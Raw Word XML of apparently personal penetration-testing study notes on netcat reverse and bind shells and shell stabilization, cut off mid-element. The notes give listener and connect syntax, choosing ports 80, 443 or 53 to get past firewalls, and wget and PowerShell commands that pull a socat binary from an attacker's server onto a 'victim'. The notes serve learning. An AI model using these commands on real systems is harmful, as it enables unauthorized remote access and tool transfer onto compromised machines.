    <w:p w14:paraId="66A8386D" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>noninteractive</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E8997D8" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>limited to using programs which do not require user interaction in order to run properly</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F932909" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>majority of simple reverse and bind shells are noninteractive</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B9A29DE" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>makes exploitation difficult</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5444FD31" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Netcat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75B22EF1" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Reverse Shells</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FBFD434" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>syntax for listener – nc -lvnp &lt;port number&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D3CA416" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>-l – listener</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A6FA79F" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>-v – verbose output</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="587E717A" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>-n – tells netcat not to resolve host names or use DNS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05D432AF" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>-p – port specification to follow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38A9237D" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>best to use port number under 1024, and a well-known one such as 80, 443, 53, to bypass firewalls – will require sudo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BC349ED" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Bind Shells</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DF7E8EF" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:lastRenderedPageBreak/>
        <w:t>if looking to obtain a shell on a target then can assume there is already a listener waiting on a chosen port</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AAFD883" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>syntax – nc &lt;target-ip&gt; &lt;chosen port&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57120290" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Netcat Shell Stabilization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68F93A82" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Technique 1 – Python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C467228" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>python -c ‘import pty;pty.spawn(“/bin/bash”)’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="759635B4" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>use python to spawn a better featured bash shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E973E0B" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>some targets may need version of python specified</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B33E505" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>export TERM=xterm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00E5AD10" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>will give access to term commands such as clear</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="062CF3CA" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>CTRL+Z</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05914FF9" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>in own terminal – stty raw -echo; fg</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32B5BC49" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>turns off terminal echo (gives access to tab autocompletes, arrow keys, and Ctrl+C to kill processes, not the whole shell)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01051943" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>then foregrounds shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BA6CE18" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>if shell dies, input into own terminal will not be visible</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="093D55C0" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>fix with reset &gt; ENTER</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="110F5C54" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Technique 2 – rlwrap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1555B120" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>gives access to history, tab autocomplete, and arrow keys immediately upon receiving a shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1378CB5B" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>some manual stabilization must still be utilized to be able to use Ctrl+C</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C1E146A" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>not installed by default</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4901DC62" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>sudo apt install rlwrap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67706614" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>to invoke</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E08FC3C" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>rlwrap nc -lvnp &lt;port&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19C16403" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>this method is useful for dealing with Windows shells</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B26953E" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>in linux, stabilize with</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02383050" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>background shell, stty raw -echo; fg</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40A216CC" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Technique 3 – Socat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2551709F" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>use an initial netcat shell as a stepping stone into a more fully-featured socat shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="405A4C71" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>limited to linux targets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63336C3B" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>first transfer to a socat static compiled binary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46CC03D3" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>sudo python3 -m http.server 80 – on attacker</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BBBA12D" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>wget &lt;local ip&gt;/socat -0 /tmp/socat – on victim</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="082307EE" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>in a windows CLI</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42F3DB00" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>done with powershell using Invoke-WebRequest</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="202568EB" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Invoke-WebRequest -uri &lt;local ip&gt;/socat.exe -outfile C:\\Windows\temp\socat.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5636B1A6" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
